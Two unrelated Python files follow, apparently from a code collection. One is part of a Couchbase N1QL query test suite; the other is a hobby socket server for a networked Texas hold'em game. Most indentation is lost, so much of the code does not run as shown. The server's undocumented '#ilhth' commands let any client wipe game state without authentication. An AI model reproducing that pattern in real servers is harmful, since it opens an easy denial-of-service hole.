self._verify_results(actual_result, expected_result)
##############################################################################################
#
# WITHIN
##############################################################################################
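    # WITHIN matches a value at any depth inside nested arrays/objects, unlike IN which only
    # inspects the top-level elements of an array.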
def test_within_list_object(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, VMs from %s WHERE 5 WITHIN VMs" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "VMs": doc["VMs"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"] if vm["RAM"] == 5])]
self._verify_results(actual_result, expected_result)
def test_prepared_within_list_object(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name, VMs from %s WHERE 5 WITHIN VMs" % query_bucket
self.prepared_common_body()
def test_within_list_of_lists(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, VMs from %s where name within [['employee-2', 'employee-4']," \
" ['employee-5']] " % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "VMs": doc["VMs"]}
for doc in self.full_list
if doc["name"] in ['employee-2', 'employee-4', 'employee-5']]
self._verify_results(actual_result, expected_result)
def test_within_object(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, tasks_points from %s WHERE 1 WITHIN tasks_points" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "tasks_points": doc["tasks_points"]}
for doc in self.full_list
if doc["tasks_points"]["task1"] == 1 or doc["tasks_points"]["task2"] == 1]
self._verify_results(actual_result, expected_result)
def test_within_array(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = " select name, skills from %s where 'skill2010' within skills" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "skills": doc["skills"]}
for doc in self.full_list
if 'skill2010' in doc["skills"]]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# RAW
##############################################################################################
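    # RAW strips the wrapping object from each projected value, so results are bare values
    # rather than {"field": value} documents.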
def test_raw(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select raw name from %s " % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select raw reverse(reverse(name)) from %s " % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
expected_result = [doc["name"] for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result, actual_result1)
def test_raw_limit(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select raw skills[0] from %s limit 5" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["skills"][0] for doc in self.full_list][:5]
self._verify_results(actual_result, expected_result)
def test_raw_order(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select raw name from {0} order by name {1}".format(query_bucket, "desc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["name"]
for doc in self.full_list]
diffs = DeepDiff(actual_result, expected_result, ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "select raw name from {0} order by name {1}".format(query_bucket, "asc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["name"] for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select raw meta().id from {0} order by meta().id {1}".format(query_bucket, "asc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = sorted(actual_result)
self.assertEqual(actual_result, expected_result)
self.query = "select raw meta().id from {0} order by meta().id {1}".format(query_bucket, "desc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = sorted(actual_result, reverse=True)
self.assertEqual(actual_result, expected_result)
def test_push_limit(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'insert into %s(KEY, VALUE) VALUES ("f01", {"f1":"f1"})' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s(KEY, VALUE) VALUES ("f02", {"f1":"f1","f2":"f2"})' % query_bucket
self.run_cbq_query()
            self.query = 'create index if1 on %s(f1)' % query_bucket
            self.run_cbq_query()
self.query = 'select q.id, q.f1,q.f2 from (select meta().id, f1,f2 from %s where f1="f1") q where q.f2 = ' \
'"f2" limit 1' % query_bucket
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
self.query = 'delete from %s use keys["f01","f02"]' % query_bucket
self.run_cbq_query()
##############################################################################################
#
# Number fns
##############################################################################################
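    # Simple smoke tests for numeric functions (abs, trig, ln, power, sqrt, sign) checked against
    # constant expected values.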
# This test has no usages anywhere
def test_abs(self):
for query_bucket in self.query_buckets:
self.query = "select join_day from %s where join_day > abs(-10)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["join_day"] for doc in self.full_list
if doc["join_day"] > abs(-10)]
self._verify_results(actual_result, expected_result)
# This test has no usages anywhere
def test_acos(self):
self.query = "select degrees(acos(0.5))"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 60}]
self._verify_results(actual_list['results'], expected_result)
# Test has no usages anywhere
def test_asin(self):
self.query = "select degrees(asin(0.5))"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 30}]
self._verify_results(actual_list['results'], expected_result)
# Test has no usages anywhere
def test_tan(self):
self.query = "select tan(radians(45))"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 1}]
self._verify_results(actual_list['results'], expected_result)
# This test has no usages anywhere
def test_ln(self):
self.query = "select ln(10) = ln(2) + ln(5)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': True}]
self._verify_results(actual_list['results'], expected_result)
# This test has no usages anywhere
def test_power(self):
self.query = "select power(sin(radians(33)), 2) + power(cos(radians(33)), 2)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 1}]
self._verify_results(actual_list['results'], expected_result)
# Test has no usages anywhere
def test_sqrt(self):
self.query = "select sqrt(9)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 3}]
self._verify_results(actual_list['results'], expected_result)
# This test has no uses anywhere
def test_sign(self):
self.query = "select sign(-5)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': -1}]
self._verify_results(actual_list['results'], expected_result)
self.query = "select sign(5)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 1}]
self._verify_results(actual_list['results'], expected_result)
self.query = "select sign(0)"
actual_list = self.run_cbq_query()
expected_result = [{'$1': 0}]
self._verify_results(actual_list['results'], expected_result)
##############################################################################################
#
# CONDITIONAL FNS
##############################################################################################
def test_nanif(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select join_day, join_mo, NANIF(join_day, join_mo) as equality" + \
" from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"join_day": doc["join_day"], "join_mo": doc["join_mo"],
"equality": doc["join_day"] if doc["join_day"] != doc["join_mo"] else 'NaN'}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_posinf(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select join_day, join_mo, POSINFIF(join_day, join_mo) as equality" + \
" from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"join_day": doc["join_day"], "join_mo": doc["join_mo"],
"equality": doc["join_day"] if doc["join_day"] != doc["join_mo"] else '+Infinity'}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# String FUNCTIONS
##############################################################################################
def test_uuid(self):
self.query = "select uuid() as uuid"
actual_list = self.run_cbq_query()
self.assertTrue('uuid' in actual_list['results'][0] and actual_list['results'][0]['uuid'],
'UUid is not working')
def test_string_fn_negative(self):
queries_errors = {'select name from %s when contains(VMs, "Sale")': ('syntax error', 3000),
'select TITLE(test_rate) as OS from %s': ('syntax error', 3000),
'select REPEAT(name, -2) as name from %s': ('syntax error', 3000),
'select REPEAT(name, a) as name from %s': ('syntax error', 3000), }
self.negative_common_body(queries_errors)
def test_contains(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where contains(job_title, 'Sale')" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select name from %s where contains(reverse(job_title), reverse('Sale'))" % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
diffs = DeepDiff(actual_result, actual_result1, ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
expected_result = [{"name": doc["name"]}
for doc in self.full_list
if doc['job_title'].find('Sale') != -1]
self._verify_results(actual_result, expected_result)
def test_initcap(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select INITCAP(VMs[0].os) as OS from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"OS": (doc["VMs"][0]["os"][0].upper() + doc["VMs"][0]["os"][1:])}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_title(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select TITLE(VMs[0].os) as OS from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select TITLE(REVERSE(VMs[0].os)) as rev_os from %s" % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
expected_result = [{"OS": (doc["VMs"][0]["os"][0].upper() + doc["VMs"][0]["os"][1:])}
for doc in self.full_list]
expected_result1 = [{"rev_os": (doc["VMs"][0]["os"][::-1][0].upper() + doc["VMs"][0]["os"][::-1][1:])} for
doc in self.full_list]
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result1, expected_result1)
def test_prepared_title(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select TITLE(VMs[0].os) as OS from %s" % query_bucket
self.prepared_common_body()
def test_position(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select POSITION(VMs[1].name, 'vm') pos from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"pos": (doc["VMs"][1]["name"].find('vm'))} for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select POSITION(VMs[1].name, 'server') pos from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"pos": (doc["VMs"][1]["name"].find('server'))}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
test_word = 'california'
for letter in test_word:
actual = self.run_position_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_position_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_position_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_position0(self):
test_word = 'california'
for letter in test_word:
actual = self.run_position_query(test_word, letter, position_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_position_query(test_word, letter, position_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_position_query(test_word, letter, position_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_position1(self):
test_word = 'california'
for letter in test_word:
actual = self.run_position_query(test_word, letter, position_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = ''
actual = self.run_position_query(test_word, letter, position_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_position_query(test_word, letter, position_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
def test_regex_contains(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select email from %s where REGEXP_CONTAINS(email, '-m..l')" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select email from %s where REGEXP_CONTAINS(reverse(email), 'l..m-')" % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
diffs = DeepDiff(actual_result, actual_result1, ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"email": doc["email"]}
for doc in self.full_list
if len(re.compile('-m..l').findall(doc['email'])) > 0]
self._verify_results(actual_result, expected_result)
def test_regex_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select email from %s where REGEXP_LIKE(email, '.*-mail.*')" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"email": doc["email"]}
for doc in self.full_list
if re.compile('.*-mail.*').search(doc['email'])]
self._verify_results(actual_result, expected_result)
def test_regex_position(self):
test_word = 'california'
for letter in test_word:
actual = self.run_regex_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_regex_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_regex_query(test_word, letter)
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_regex_position0(self):
test_word = 'california'
for letter in test_word:
actual = self.run_regex_query(test_word, letter, regex_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = ''
actual = self.run_regex_query(test_word, letter, regex_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_regex_query(test_word, letter, regex_type='0')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_regex_position1(self):
test_word = 'california'
for letter in test_word:
actual = self.run_regex_query(test_word, letter, regex_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = ''
actual = self.run_regex_query(test_word, letter, regex_type='1')
expected = test_word.find(letter) + 1
self.assertEqual(actual, expected)
letter = 'd'
actual = self.run_regex_query(test_word, letter, regex_type='1')
expected = test_word.find(letter)
self.assertEqual(actual, expected)
def test_regex_replace(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, REGEXP_REPLACE(email, '-mail', 'domain') as mail from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"mail": doc["email"].replace('-mail', 'domain')}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select name, REGEXP_REPLACE(email, 'e', 'a', 2) as mail from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"mail": doc["email"].replace('e', 'a', 2)}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_replace(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, REPLACE(email, 'a', 'e', 1) as mail from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"mail": doc["email"].replace('a', 'e', 1)}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_repeat(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select REPEAT(name, 2) as name from %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"] * 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# LET
##############################################################################################
def test_let_nums(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select test_r, test_r > 2 compare from %s let test_r = (test_rate / 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"test_r": doc["test_rate"] / 2,
"compare": (doc["test_rate"] / 2) > 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_prepared_let_nums(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select test_r, test_r > 2 compare from %s let test_r = (test_rate / 2)" % query_bucket
self.prepared_common_body()
def test_let_string(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, join_date as date from %s let join_date = tostr(join_yr) || '-' || tostr(" \
"join_mo)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"],
"date": '%s-%s' % (doc['join_yr'], doc['join_mo'])}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select name, join_date as date from %s let join_date = reverse(tostr(join_yr)) || '-' || " \
"reverse(tostr(join_mo)) order by name, meta().id limit 10" % query_bucket
actual_list2 = self.run_cbq_query()
actual_result2 = actual_list2['results']
expected_result2 = [{'date': '1102-9', 'name': 'employee-1'}, {'date': '1102-9', 'name': 'employee-1'},
{'date': '1102-9', 'name': 'employee-1'}, {'date': '1102-9', 'name': 'employee-1'},
{'date': '1102-9', 'name': 'employee-1'}, {'date': '1102-9', 'name': 'employee-1'},
{'date': '0102-4', 'name': 'employee-1'}, {'date': '0102-4', 'name': 'employee-1'},
{'date': '0102-4', 'name': 'employee-1'}, {'date': '0102-4', 'name': 'employee-1'}]
self._verify_results(actual_result2, expected_result2)
def test_letting(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, sum_test from %s WHERE join_mo>7 group by join_mo letting sum_test = sum(" \
"tasks_points.task1)" % query_bucket
if self.analytics:
self.query = "SELECT d.join_mo, sum_test from %s d WHERE d.join_mo>7 group by d.join_mo letting " \
"sum_test = sum(d.tasks_points.task1)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['join_mo'] for doc in self.full_list if doc['join_mo'] > 7}
expected_result = [{"join_mo": group,
"sum_test": sum([x["tasks_points"]["task1"] for x in self.full_list
if x["join_mo"] == group])}
for group in tmp_groups]
self._verify_results(actual_result, expected_result)
def test_prepared_letting(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, sum_test from %s WHERE join_mo>7 group by join_mo letting sum_test = sum(" \
"tasks_points.task1)" % query_bucket
self.prepared_common_body()
# https://issues.couchbase.com/browse/MB-26086
def check_special_symbols(self):
self.fail_if_no_buckets()
symbols = ['~', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '_', '-', '+', '=', '{', '[', '}', ']', '|',
'.', ':', ';', '"', '<', ',', '>', '.', '?', '/']
errors_simple = {}
errors_complex = {}
query = "INSERT INTO " + self.query_buckets[0] + " VALUES ('simple', {"
for i in range(len(symbols)):
query += "'a" + symbols[i] + "b':1"
if i < len(symbols) - 1:
query += ","
query += "})"
self.run_cbq_query(query)
for i in range(len(symbols)):
query = "SELECT `a" + symbols[i] + "b` FROM " + self.query_buckets[0] + " USE KEYS ['simple'] WHERE `a" + \
symbols[i] + "b` IS NOT MISSING"
result = self.run_cbq_query(query)
if result['metrics']['resultCount'] < 1:
errors_simple[symbols[i]] = query
        # Assuming only 3 special characters (~!@), the resulting query would look like:
# INSERT INTO default VALUES ('complex', {'a~b':{'a~b':12, 'a!b':12, 'a@b':12},
# 'a!b':{'a~b':12, 'a!b':12, 'a@b':12},
# 'a@b':{'a~b':12, 'a!b':12, 'a@b':12 }})
query = "INSERT INTO " + self.query_buckets[0] + " VALUES ('complex', {"
for i in range(len(symbols)):
query += "'a" + symbols[i] + "b':{"
for j in range(len(symbols)):
query += "'a" + symbols[j] + "b':12"
if j < len(symbols) - 1:
query += ","
else:
query += "}"
if i < len(symbols) - 1:
query += ","
query += "})"
self.run_cbq_query(query)
for i in range(len(symbols)):
for j in range(len(symbols)):
query = "SELECT `a" + symbols[i] + "b`.`a" + symbols[j] + \
"b` FROM " + self.query_buckets[0] + " USE KEYS ['complex'] WHERE `a" + symbols[i] + \
"b`.`a" + symbols[j] + "b` IS NOT MISSING"
result = self.run_cbq_query(query)
if result['metrics']['resultCount'] < 1:
errors_complex[str(symbols[i]) + str(symbols[j])] = query
self.assertEqual(len(errors_simple) + len(errors_complex), 0)
|
server.py
|
import sys
print(sys.path[0])
sys.path.append(sys.path[0] + '/../..')
import socketserver
import threading
from time import sleep
from NetworkVersion.Server.protocal import Protocol
from NetworkVersion.game_manager import GameManager
from NetworkVersion.utils import Action, Player_State
g_conn_pool = []  # connection pool
ready_num = 0  # TODO: remember to reset this to zero
gm = None
LEAST_PLAYER_NUM = 2
INIT_POSSESS = 10000
BASE_CHIP = 100
class Conn:
def __init__(self, conn):
self.conn = conn
self.name = None
self.id = -1
self.is_ready = False
def init_client_players():
    # When the GameManager is first created, each client needs to initialize a
    # PlayerPublicInfo list of size player_num; also tell each client what its own id is.
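    # Packet layout built below: str "init_players", int32 player_num, int32 receiver id,
    # then one str per connection carrying that player's name.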
player_num = len(g_conn_pool)
for r in g_conn_pool:
ret = Protocol()
ret.add_str("init_players")
ret.add_int32(player_num)
ret.add_int32(r.id)
for k in g_conn_pool:
ret.add_str(k.name)
r.conn.sendall(ret.get_pck_has_head())
def refresh_player_public_info():
global gm
    # TODO: send each player's public info to the clients; each client uses the id to tell which entry is its own
    # TODO: could be optimized to only update the info of the player with a given pid
    ret = Protocol()
    # The payload is a list of (pid, possess, cur_bet, current_state) entries
ret.add_str("public_info")
num = len(g_conn_pool)
ret.add_int32(num)
for r in g_conn_pool:
pid = r.id
public_info = gm.get_public_info_by_pid(pid)
ret.add_int32(pid)
ret.add_int32(public_info[0])
ret.add_int32(public_info[1])
ret.add_int32(public_info[2].value)
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def refresh_player_private_info(pidx):
global gm
    # TODO: send the private info (hole cards) to the client with the given id
for r in g_conn_pool:
if r.id == pidx:
ret = Protocol()
ret.add_str("private_info")
str_cards = " ".join(gm.get_player_card_by_pid(pidx))
ret.add_str(str_cards)
r.conn.sendall(ret.get_pck_has_head())
break
def refresh_player_open_card():
global gm
ret = Protocol()
ret.add_str("open_card")
ret.add_int32(gm.env.current_left_player_num)
for r in g_conn_pool:
pid = r.id
if gm.players[pid].current_state not in [Player_State.FOLD, Player_State.OUT]:
ret.add_int32(pid)
ret.add_str(" ".join(gm.get_player_card_by_pid(pid)))
ret.add_str(gm.players[pid].current_chosen_card_info.best_card_type +
' '+' '.join([card.rank for card in gm.players[pid].current_chosen_card_info.best_card]))
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def refresh_env_info():
global gm
    # broadcast the env info to everyone: community cards, maximum bet, big-blind position, etc.
public_card, pool_possess, BB_id, current_max_bet, current_left_player_num = gm.get_env_info()
str_public_card = " ".join(public_card)
ret = Protocol()
ret.add_str("env_info")
ret.add_str(str_public_card)
ret.add_int32(pool_possess)
ret.add_int32(BB_id)
ret.add_int32(current_max_bet)
ret.add_int32(current_left_player_num)
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def game_start():
ret = Protocol()
ret.add_str("game_start")
for r in g_conn_pool:
r.conn.sendall(ret.get_pck_has_head())
def game_over():
ret = Protocol()
ret.add_str("game_over")
    # TODO: clean up ready states etc. / print info
global ready_num
# ready_num = 0
ready_num = len(g_conn_pool) - gm.alive_player_num
for r in g_conn_pool:
r.is_ready = False
r.conn.sendall(ret.get_pck_has_head())
def play_a_game():
    # GameManager's play_a_game is implemented here instead, so that sending messages to the
    # clients and checking the game state can be interleaved.
    global gm
    # Returns the winner of the hand; -1 means there are not enough players and the game is over.
    # Before starting, the big/small blind positions are assumed to be set and at least two players are at the table.
if gm.alive_player_num < 2:
return -1
gm.poker.reset_card()
    # TODO: handle players who are all-in right at the start of the hand
gm.init_env(gm.BB_pos, len(gm.alive_player_id))
    # post the blinds
gm.env.pool_possess += gm.players[gm.alive_player_id[gm.BB_pos]].bet(2 * gm.base_chip)
gm.env.pool_possess += gm.players[gm.alive_player_id[gm.SB_pos]].bet(gm.base_chip)
    # update player info and env info
refresh_env_info()
refresh_player_public_info()
    # deal two hole cards to each player
for pidx in gm.alive_player_id:
gm.players[pidx].card += gm.poker.deal(2)
refresh_player_private_info(pidx)
gm.update_env()
# self.print_info(current_player_idx)
    # first betting round
if not gm.a_round_of_bet(g_conn_pool):
return
    # deal three community cards (the flop)
gm.env.public_cards += gm.poker.deal(3)
gm.update_env()
refresh_env_info()
    # second betting round
if not gm.a_round_of_bet(g_conn_pool):
return
    # deal one community card (the turn)
gm.env.public_cards += gm.poker.deal(1)
gm.update_env()
refresh_env_info()
    # third betting round
if not gm.a_round_of_bet(g_conn_pool):
return
    # deal one community card (the river)
gm.env.public_cards += gm.poker.deal(1)
gm.update_env()
refresh_env_info()
    # final betting round
if not gm.a_round_of_bet(g_conn_pool):
return
    # showdown: compare hands and split the pot
    gm.compare_card()  # gm.alive and the BB position may change here
refresh_player_open_card()
gm.end_match()
    # It can also happen that enough players are present for the next hand (e.g. 3) but alive < 2.
    # update player info and env info
refresh_env_info()
refresh_player_public_info()
def a_game_process(log_file='info.log'):
game_start()
with open(log_file, 'a+') as f:
f.write('*'*30)
play_a_game()
with open(log_file, 'a+') as f:
f.write('*'*30)
f.write('\n')
game_over()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def setup(self):
self.request.sendall("连接服务器成功!".encode(encoding='utf8'))
# 加入连接池
conn = Conn(self.request)
g_conn_pool.append(conn)
def handle(self):
while True:
try:
                # read a data packet
bytes = self.request.recv(1024)
                # split the stream into packets
while True:
                    # read the packet length
length_pck = int.from_bytes(bytes[:4], byteorder='little')
                    # slice out the packet body
pck = bytes[4:4 + length_pck]
                    # drop the bytes that have already been read
bytes = bytes[4 + length_pck:]
                    # hand the packet to the handler
self.pck_handler(pck)
                    # if there are no bytes left, break out of the loop
if len(bytes) == 0:
break
# print("客户端消息:", bytes.decode(encoding="utf8"))
            except Exception as e:  # unexpected disconnect
print("---------------------------")
print("玩家:【%s】掉线啦。" % self.get_conn().name)
self.remove()
global ready_num, gm, g_conn_pool
if len(g_conn_pool) == 0:
                    print('All players have left, resetting!')
ready_num = 0
gm = None
                    g_conn_pool = []  # will this leak memory? Python should clean it up by itself
break
def finish(self):
pass
def get_conn(self):
for conn in g_conn_pool:
if conn.conn == self.request:
return conn
def pck_handler(self, pck):
"""
        Parse a data packet.
"""
p = Protocol(pck)
pck_type = p.get_str()
# print('getting package %s...' % pck_type)
global ready_num, gm, g_conn_pool
if pck_type == 'register':
name = p.get_str()
self.get_conn().name = name
print(name, ' register')
elif pck_type == 'ready' and not self.get_conn().is_ready:
print(self.get_conn().name, ' get ready')
self.get_conn().is_ready = True
ready_num += 1
if len(g_conn_pool) >= LEAST_PLAYER_NUM and len(g_conn_pool) == ready_num:
                # The thread of the last player to press "ready" acts somewhat like the room host.
                # Start the game.
                if gm is None:
                    # If this is the first game, initialize the table's game manager first.
gm = GameManager(player_num=ready_num, init_possess=INIT_POSSESS, base_chip=BASE_CHIP)
                    # assign an id to each player (sequential order is fine)
for i, conn in enumerate(g_conn_pool):
conn.id = i
init_client_players()
else:
                    # TODO: if games have already been played, how should game k start? Should players be cleaned up, state reset, online status checked, newly joined players handled, and so on?
pass
                    # This does not work yet; a new game cannot be started in this case.
game = threading.Thread(target=a_game_process)
game.daemon = True
game.start()
elif pck_type == 'action':
pid = self.get_conn().id
action_type = p.get_int32()
money = p.get_int32()
# print('get_action: pid=%d, type=%d, money=%d'%(pid, action_type, money))
no2action = {1: 'FOLD', 2: 'CHECK_OR_CALL', 3: 'CALL_AND_RAISE'}
action = Action(no2action[action_type], money)
            # record the action taken by the corresponding player in gm
gm.player_actions[pid] = action
gm.player_action_flag[pid] = True
elif pck_type == '#ilhth restart' and ready_num == 0:
            # secret command: lets the table restart when someone is out of money, so the game does not have to be reopened every time
gm = None
elif pck_type == '#ilhth clear':
            # secret command: clear the table, so the server can keep running and does not need to be restarted every time
ready_num = 0
gm = None
            g_conn_pool = []  # will this leak memory? Python should clean it up by itself
def remove(self):
        # # tell each client that a player has gone offline
# ret = Protocol()
# ret.add_str("logout")
# ret.add_str(self.get_conn().name)
# for r in g_conn_pool:
# if r != self.get_conn():
# r.conn.sendall(ret.get_pck_has_head())
g_conn_pool.remove(self.get_conn())
pass
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
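# Illustrative sketch only (not used by the server): handle() above assumes that every packet
# on the wire is framed as a 4-byte little-endian length header followed by the payload, which
# is what Protocol.get_pck_has_head() from NetworkVersion is presumed to produce. A minimal
# stand-alone version of that framing, with the parsing loop mirroring handle(), could be:
def _frame_packet(payload):
    # prepend the payload length as 4 little-endian bytes
    return len(payload).to_bytes(4, byteorder='little') + payload
def _split_packets(buffer):
    # collect complete payloads until the buffer is exhausted, like the inner loop in handle()
    packets = []
    while buffer:
        length = int.from_bytes(buffer[:4], byteorder='little')
        packets.append(buffer[4:4 + length])
        buffer = buffer[4 + length:]
    return packets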
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
    parser.add_argument('--port', '-p', type=int, default=23456, help='port number')
    parser.add_argument('--init_chip', '-ic', type=int, default=10000, help='initial chips')
    parser.add_argument('--base_chip', '-bc', type=int, default=100, help='minimum betting chip')
    parser.add_argument('--least_player_num', '-lpn', type=int, default=2, help='minimum number of players')
args = parser.parse_args()
port = args.port
INIT_POSSESS = args.init_chip
BASE_CHIP = args.base_chip
LEAST_PLAYER_NUM = args.least_player_num
    ip = input('Enter the server IP (press Enter to use the default): ')
if ip == '':
ip = '192.168.1.110'
    ADDRESS = (ip, port)  # bind address
    # ADDRESS = ('127.0.0.1', port)  # bind address
server = ThreadedTCPServer(ADDRESS, ThreadedTCPRequestHandler)
    # run the server in a separate thread
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = False
server_thread.start()
    # main-thread logic
while True:
sleep(3)
        # input cannot be used when running in the background on Linux
# cmd = input("""--------------------------
        # # Enter 1: show the number of players currently online
        # # Enter 2: shut down the server
# # """)
# if cmd == '1':
# print("--------------------------")
# print("当前在线人数:", len(g_conn_pool))
# elif cmd == '2':
# server.shutdown()
